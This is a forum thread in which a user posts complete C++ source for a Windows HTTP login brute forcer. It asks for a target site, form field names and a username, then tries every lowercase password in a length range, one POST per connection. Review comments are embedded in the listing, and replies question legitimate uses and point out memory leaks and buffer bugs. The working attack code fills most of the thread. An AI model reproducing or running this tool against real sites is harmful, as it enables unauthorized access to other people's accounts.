
Thread: Brute Forcer Example Source Code

  1. #1
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default Brute Forcer Example Source Code

    I coded this some time ago for Windows; I'll be making a nice brute forcer out of this for BT soon. (Probably tomorrow.)

    Code:
    /*
    **
    ** Brute Forcer Example Source Code
    ** UnnamedOne
    ** brian_denys@hotmail.com
    ** hxxp://xxx.remote-exploit.org
    **
    */
    
    #include <winsock2.h>
    #include <windows.h>
    #include <stdio.h>
    #include <string.h>
    #include <signal.h>
    #include <stdarg.h>
    #include <iostream.h>
    #pragma comment(lib, "ws2_32.lib")
    
    // NOTE(review): neither macro is referenced anywhere else in this listing.
    #define ijji "Avatar"
    #define SkyGamers ""
    
    // Socket for the current attempt: written by Connect(), read by guess() and chunk().
    SOCKET Conn;
    // Operator-supplied settings, filled from stdin in main().
    // NOTE(review): all are fixed-size buffers; main() reads into them without a length limit.
    char URL[256];      // host name; passed to Connect() and used for the Host/Referer headers
    char Path[256];     // request path used on the POST request line
    char UserVar[256];  // name of the form field carrying the username
    char PassVar[256];  // name of the form field carrying the password
    char Username[32];  // account name sent with every attempt
    // Default alphabet; StartBrute() copies it into the working charset.
    char def_charset[] = "abcdefghijklmnopqrstuvwxyz";
    // inc[i] is the index into the charset of the character currently at candidate position i.
    // NOTE(review): 128 entries, but chunk() never checks the requested length against this size.
    unsigned int inc[128];
    
    // Prototypes
    // Connect, send, etc..
    int Connect(char* szIP, int szPort);
    int guess(char* szUser, char* szPass);
    int remotePOST(SOCKET m_sConnection, CHAR* m_cHost, CHAR* m_cPath, CHAR* m_cData, CHAR* m_cReferer, CHAR* m_cCookies);
    int End(SOCKET s);
    // Brute Force Algorithm Functions
    int finished(char *block, char *charset, char *templ);
    void increment(char *block, int len, char *charset, char *templ);
    void chunk(int start, int end, char *charset, char *templ, char *startblock);
    int StartBrute(int min, int max);
    
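    // Entry point: reads the run settings from stdin into the file-scope
    // buffers (URL, Path, UserVar, PassVar, Username) and the length range,
    // then hands the range to StartBrute().
    //
    // Returns 0 after StartBrute() returns, or 1 if stdin could not supply
    // all of the requested values.
    int main()
    {
    	// Initialised so a failed numeric read can never leave them indeterminate.
    	int min = 0, max = 0;

    	// `cin >> char[]` with no width set copies a whole token regardless of
    	// the destination size. width(n) caps each extraction at n-1 characters
    	// plus the terminating NUL and resets itself after every read, so it is
    	// set again before each buffer. Any excess of an over-long token stays
    	// in the stream and is consumed by the next read: the fields come out
    	// wrong, but no buffer is overrun.
    	cout << "Enter URL of target witout hxxp:// (Ex. xxx.targethost.com)" << endl;
    	cin.width(sizeof(URL));
    	cin >> URL;
    	cout << "Enter Path (Ex. /index.php)" << endl;
    	cin.width(sizeof(Path));
    	cin >> Path;
    	cout << "Username variable (Ex. vBulletin_username)" << endl;
    	cin.width(sizeof(UserVar));
    	cin >> UserVar;
    	cout << "Password variable (Ex. vBulletin_password)" << endl;
    	cin.width(sizeof(PassVar));
    	cin >> PassVar;
    	cout << "Target Username (Ex. Asshole)" << endl;
    	cin.width(sizeof(Username));
    	cin >> Username;
    	cout << "Minimum characters?" << endl;
    	cin >> min;
    	cout << "Maximum characters?" << endl;
    	cin >> max;

    	// A failed or exhausted stream means at least one setting was never read.
    	if(!cin)
    	{
    		cout << "Invalid or incomplete input." << endl;
    		return 1;
    	}

    	// NOTE(review): min/max are still passed on unvalidated; chunk() uses
    	// them as lengths against fixed 128-element arrays.
    	StartBrute(min,max);
    	return 0;
    }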
    
    // Initialises Winsock, creates a TCP socket, resolves szIP with
    // gethostbyname() and connects to szPort. On success the socket is stored
    // in the global Conn and also returned.
    //
    // szIP   - host to resolve (chunk() passes the global URL here)
    // szPort - TCP port, host byte order
    //
    // Returns 1 on socket()/connect() failure, otherwise the socket handle
    // converted to int.
    // NOTE(review): a valid handle and the error value share one int range,
    // and every caller in this listing ignores the return value anyway.
    int Connect(char* szIP, int szPort)
    {
    	WSADATA wsaData;
    	int iResult;
    	SOCKET ConnectSocket;
    	sockaddr_in clientService;
    	struct hostent* m_hHost;
    
    	iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    	// NOTE(review): a WSAStartup failure is only reported; execution continues.
    	if(iResult != NO_ERROR)
    		printf("Error at WSAStartup()\n");
    
    	ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    	if(ConnectSocket == INVALID_SOCKET)
    	{
    		// NOTE(review): WSAGetLastError() returns int, which does not match %ld.
    		printf("Error at socket(): %ld\n", WSAGetLastError());
    		WSACleanup();
    		return 1;
    	}
    
    	// NOTE(review): gethostbyname() returns NULL when resolution fails; the
    	// result is dereferenced below without a check.
    	m_hHost = gethostbyname(szIP);
    
    	memset( &clientService, 0, sizeof clientService );
    
    	clientService.sin_family = AF_INET;
    	clientService.sin_addr = *(struct in_addr *)m_hHost->h_addr;
    	clientService.sin_port = htons(szPort);
    
    	if(connect(ConnectSocket, (SOCKADDR*) &clientService, sizeof(clientService)) == SOCKET_ERROR)
    	{
    		printf( "Failed to connect.\n" );
    		// NOTE(review): ConnectSocket is not closed on this path, and Conn
    		// keeps whatever value the previous attempt left in it.
    		WSACleanup();
    		return 1;
    	}
    	else
    	{
    		//printf("Connected to %s:%d\n", m_hHost->h_name, szPort);
    	}
    
    	// Publish the connected socket for guess() and End().
    	Conn = ConnectSocket;
    
    	return ConnectSocket;
    }
    
    // Sends one login attempt over the global socket Conn and inspects the reply.
    //
    // Builds the form body "<UserVar>=<szUser>&<PassVar>=<szPass>", posts it
    // with remotePOST(), reads the response with a single recv() and prints it.
    // If the response contains the substring "changed", the password is shown
    // in a message box and the process exits.
    //
    // Always returns 0.
    //
    // NOTE(review): none of the malloc() results is checked, and none of the
    // three buffers is ever freed, so roughly 800 KB is leaked on every call
    // (reply #8 in this thread raises the same point).
    int guess(char* szUser, char* szPass)
    {
    	int iResult;
    	int recvbuflen = 800096;
    	char* recvbuf = (char*)malloc(800096);
    
    	// NOTE(review): unbounded sprintf into 256 bytes; URL alone may hold up
    	// to 255 characters before the 7-character prefix is added.
    	char* hxxpURL = (char*)malloc(256);
    	sprintf(hxxpURL, "hxxp://%s",URL);
    
    	// NOTE(review): unbounded sprintf into 256 bytes; the four inputs
    	// together can exceed it.
    	char* vars = (char*)malloc(256);
    	sprintf(vars, "%s=%s&%s=%s",UserVar, szUser, PassVar, szPass);
    
    	remotePOST(Conn, URL, Path, vars, hxxpURL, NULL);
    
    	iResult = recv(Conn, recvbuf, recvbuflen, 0);
    	// NOTE(review): recv() returns SOCKET_ERROR (-1) on failure, which makes
    	// this a write to recvbuf[-1]; a read that fills the buffer makes it a
    	// write one byte past the end, because recvbuflen is the full allocation.
    	recvbuf[iResult] = 0x00;
    	printf("%s",recvbuf);
    	// Success is decided purely by the word "changed" appearing in the response.
    	char* strip = strstr(recvbuf, (const char*)"changed");
    	//printf("%s\n",strip);
    	if(strip != NULL){
    		MessageBox(NULL,szPass,"Found!",MB_OK);
    		ExitProcess(0);
    	}
    
    	// NOTE(review): recvbuf is a pointer, so sizeof yields the pointer size
    	// and only the first few bytes are cleared.
    	memset(recvbuf,0,sizeof(recvbuf));
    
    	return 0;
    }
    
    // Writes a form POST to m_sConnection in four send() calls: request line
    // and headers, the Content-Type header, the Content-Length header plus the
    // blank line, then the body.
    //
    // m_sConnection - connected socket
    // m_cHost       - value for the Host header
    // m_cPath       - path placed on the request line
    // m_cData       - request body; its strlen() becomes Content-Length
    // m_cReferer    - value for the Referer header
    // m_cCookies    - value for the Cookie header, or NULL to omit that header
    //
    // Returns the result of the last send() that was attempted.
    //
    // Defender's view: every request carries the same hard-coded User-Agent
    // string and keep-alive headers, while chunk() opens a fresh connection for
    // each attempt, so the traffic is uniform and easy to recognise in web logs.
    int remotePOST(SOCKET m_sConnection, CHAR* m_cHost, CHAR* m_cPath, CHAR* m_cData, CHAR* m_cReferer, CHAR* m_cCookies)
    {
    	// NOTE(review): the malloc() result is not checked, and both sprintf()
    	// calls below write caller-supplied strings into these 2096 bytes with
    	// no length limit.
    	CHAR* m_cCompleteBuffer = (CHAR*)malloc(2096);
    
    	// The two branches differ only in the trailing Cookie header.
    	if(m_cCookies)
    	{
    		sprintf(m_cCompleteBuffer,
    			"POST %s "
    			"HXXP/1.1\r\n"
    			"Host: %s\r\n"
    			"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n"
    			"Referer: %s\r\n"
    			"Keep-Alive: 300\r\n"
    			"Connection: keep-alive\r\n"
    			"Cookie: %s\r\n"
    			,m_cPath
    			,m_cHost
    			,m_cReferer
    			,m_cCookies);
    	}
    	else
    	{
    		sprintf(m_cCompleteBuffer,
    			"POST %s "
    			"HXXP/1.1\r\n"
    			"Host: %s\r\n"
    			"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n"
    			"Referer: %s\r\n"
    			"Keep-Alive: 300\r\n"
    			"Connection: keep-alive\r\n"
    			,m_cPath
    			,m_cHost
    			,m_cReferer);
    	}
    
    	// NOTE(review): m_cDummy points at a string literal through a non-const pointer.
    	CHAR* m_cDummy  = "Content-Type: application/x-www-form-urlencoded\r\n";
    	CHAR* m_cDummy2 = (CHAR*)malloc(128);
    
    	INT m_iLength = strlen(m_cData);
    
    	sprintf(m_cDummy2,"Content-Length: %i\r\n\r\n",m_iLength);
    
    	INT m_iReturn = send(m_sConnection,m_cCompleteBuffer,strlen(m_cCompleteBuffer),0);
    	
    	// NOTE(review): send() reports failure as SOCKET_ERROR (-1), which is
    	// non-zero, so these tests treat a failed send as success; only a return
    	// of 0 stops the chain.
    	if(m_iReturn)
    	{
    		m_iReturn = send(m_sConnection,m_cDummy,strlen(m_cDummy),0);
    		
    		if(m_iReturn)
    		{
    			m_iReturn = send(m_sConnection,m_cDummy2,strlen(m_cDummy2),0);
    				
    				if(m_iReturn)
    				{
    					m_iReturn = send(m_sConnection,m_cData,strlen(m_cData),0);
    
    					if(m_iReturn)
    					{
    						free(m_cDummy2);
    						free(m_cCompleteBuffer);
    						return m_iReturn;
    					}
    				}
    		}
    	}
    
    	// Reached when any send() returned 0; releases the same two buffers.
    	free(m_cDummy2);
    	free(m_cCompleteBuffer);
    
    	return m_iReturn;
    }
    
    // Tears down one attempt's connection: shuts down the sending side of s,
    // closes it, and calls WSACleanup() to balance the WSAStartup() made in
    // Connect().
    //
    // Always returns 1; the results of shutdown() and closesocket() are ignored.
    int End(SOCKET s)
    {
    	shutdown(s, SD_SEND);
    	closesocket(s);
    	WSACleanup();
    
    	return 1;
    }
    
    // Brute Force Algoritm Functions
    // hxxp://darkc0de.com/c0de/c/crunch.txt
    // Reports whether the candidate in `block` is the last one of its length.
    //
    // block   - current candidate string; only its length is used here
    // charset - alphabet; the last index is strlen(charset)-1
    // templ   - empty string means every position varies; otherwise only the
    //           positions holding '@' vary
    //
    // Returns FALSE as soon as one varying position (per the global inc[])
    // has not yet reached the last charset index, TRUE otherwise.
    int finished(char *block, char *charset, char *templ)
    {
    	const size_t blockLen = strlen(block);
    	const size_t lastIdx = strlen(charset) - 1;
    	const int everyPositionVaries = (templ[0] == 0);
    	size_t pos;

    	for (pos = 0; pos < blockLen; pos++)
    	{
    		// With a template, fixed (non-'@') positions never count.
    		if (!everyPositionVaries && templ[pos] != '@')
    			continue;

    		if (inc[pos] < lastIdx)
    			return FALSE;
    	}

    	return TRUE;
    }
    
    // Advances `block` to the next candidate, odometer-style from the right.
    //
    // block   - candidate string, modified in place
    // len     - not used by this function
    // charset - alphabet the varying positions cycle through
    // templ   - empty string means every position varies; otherwise only the
    //           positions holding '@' vary
    //
    // The rightmost varying position that is below the last charset index is
    // stepped forward and the walk stops; every varying position passed on the
    // way is wrapped back to charset[0]. The global inc[] is kept in step.
    void increment(char *block, int len, char *charset, char *templ)
    {
    	const size_t lastIdx = strlen(charset) - 1;
    	int pos = strlen(block) - 1;

    	while (pos > -1)
    	{
    		if (templ[0] == 0 || templ[pos] == '@')
    		{
    			if (inc[pos] < lastIdx)
    			{
    				// Room left at this position: step it and stop carrying.
    				inc[pos]++;
    				block[pos] = charset[inc[pos]];
    				break;
    			}

    			// Position exhausted: wrap it and carry to the left.
    			block[pos] = charset[0];
    			inc[pos] = 0;
    		}
    		pos--;
    	}
    }
    
    // Walks every candidate of length `start` through `end` and submits each one.
    //
    // start, end - inclusive range of candidate lengths
    // charset    - alphabet for the varying positions
    // templ      - empty string means every position varies; otherwise '@'
    //              marks a varying position and any other character is copied
    //              as a literal
    // startblock - empty string means each length starts at charset[0];
    //              otherwise its characters seed the first candidate
    //
    // For every candidate the function prints it, calls Connect(URL, 80),
    // guess(Username, block) and End(Conn), then moves on with increment()
    // until finished() reports the last candidate of that length.
    //
    // Defender's view: each attempt is a separate short-lived TCP connection
    // carrying one login POST for the same username, so per-account failure
    // counters, lockout and rate limiting all see every single guess.
    void chunk(int start, int end, char *charset, char *templ, char *startblock)
    {
    	int i,j,k,t;
    	// NOTE(review): block and the global inc[] both hold 128 entries, but
    	// `end` is never checked against that size; lengths above 127 overrun
    	// them (block also needs room for its terminating NUL).
    	char block[128];
    
    	if(end-start <0) return;
    
    	// t records whether a template is in use.
    	if(templ[0]==0) t=0;
    	else		t=1;
    
    	for(i=start;i<=end;i++)
    	{
    		memset(block,0,sizeof(block));
    
    		// Build the first candidate of length i.
    		for(j=0;j<i;j++)
    		{
    			if(startblock[0]==0)
    			{
    				if(t==0)
    				{
    					block[j] = charset[0];
    					inc[j] = 0;
    				}
    				else
    				{
    					if(templ[j]=='@')
    					{
    						block[j] = charset[0];
    						inc[j] = 0;
    					}
    					else			block[j] = templ[j];
    				}
    			}
    			else
    			{
    				block[j] = startblock[j];
    
    				// Recover inc[j] by looking the seed character up in charset.
    				// NOTE(review): signed k is compared against the unsigned strlen() result.
    				for(k=0;k<strlen(charset);k++)
    					if(block[j]==charset[k]) inc[j] = k;
    			}
    		}
    
    		// NOTE(review): the return values of Connect() and guess() are
    		// ignored, so a failed connect is followed by guess() on whatever
    		// socket value Conn still holds.
    		printf("Trying: %s\n",block);
    		Connect(URL, 80);
    		guess(Username, block);
    		End(Conn);
    		while(!finished(block,charset,templ))
    		{
    			increment(block,i,charset,templ);
    			printf("Trying: %s\n",block);
    			Connect(URL, 80);
    			guess(Username, block);
    			End(Conn);
    		}
    	}
    }
    
    // Prepares the working buffers and starts the enumeration.
    //
    // min, max - inclusive range of candidate lengths, passed straight to chunk()
    //
    // The template and start block are left empty, which chunk() treats as
    // "no template" and "begin each length at charset[0]". The charset is the
    // file-scope def_charset.
    //
    // Always returns 1.
    int StartBrute(int min, int max)
    {
    	// All three buffers start out zero-filled.
    	char charset[256] = {0};
    	char templ[256] = {0};
    	char startblock[256] = {0};
    	const size_t defaultLen = strlen(def_charset);

    	// Copies the characters only; the terminator comes from the zero fill.
    	memcpy(charset, def_charset, defaultLen);

    	chunk(min, max, charset, templ, startblock);

    	return 1;
    }

  2. #2
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    I'm curious as to what legitimate purposes this code could be used for.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  3. #3
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    Well if it's not allowed remove ^.^

    But I think it is.. Since there's brute forcers included in BT

  4. #4
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by UnnamedOne View Post
    Well if it's not allowed remove ^.^

    But I think it is.. Since there's brute forcers included in BT
    I didn't say it wasn't allowed, I am simply curious as to what legitimate uses this code has.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  5. #5
    Senior Member Thorn's Avatar
    Join Date
    Jan 2010
    Location
    The Green Dome
    Posts
    1,509

    Default

    It appears to be HTTP only. Does this offer something that other brute force programs don't have?
    Thorn
    Stop the TSA now! Boycott the airlines.

  6. #6
    Junior Member
    Join Date
    Mar 2008
    Posts
    35

    Default

    Quote Originally Posted by Thorn View Post
    It appears to be HTTP only. Does this offer something that other brute force programs don't have?
    Nope, I just code things like this as a challenge for myself.

  7. #7
    Junior Member
    Join Date
    May 2007
    Posts
    82

    Default

    UnnamedOne!!! Just checked out your code. I don't really know C++ that much, but I know C, and from what I can see it's pretty good, even if other brute forcers do HTTP attacks! It's a start!!!! Keep it up ^_^. Programming just for the challenge :-D like me :-D

  8. #8
    Just burned his ISO
    Join Date
    Jun 2007
    Posts
    15

    Default possible memory leak?

    Hello,
    I haven't tried to compile or run your program; I have only read the code, so my opinion could be totally wrong.
    I think your program has multiple memory leaks. For example, the function "int guess(char* szUser, char* szPass)" allocates three buffers, "char* recvbuf = (char*)malloc(800096);", "char* hxxpURL = (char*)malloc(256);" and "char* vars = (char*)malloc(256);", but never frees them.
    I also see that you use the return value of "recv" as an index into recvbuf: "iResult = recv(Conn, recvbuf, recvbuflen, 0); recvbuf[iResult] = 0x00;". That is dangerous, because "recv" can return -1, and the assignment would then write to recvbuf[-1], outside the buffer!
    Sorry if I'm bothering you; I hope my post is useful.

  9. #9
    Just burned his ISO masliko's Avatar
    Join Date
    Mar 2008
    Posts
    7

    Default

    What language is this written in?(sorry i don't know any programming at all)
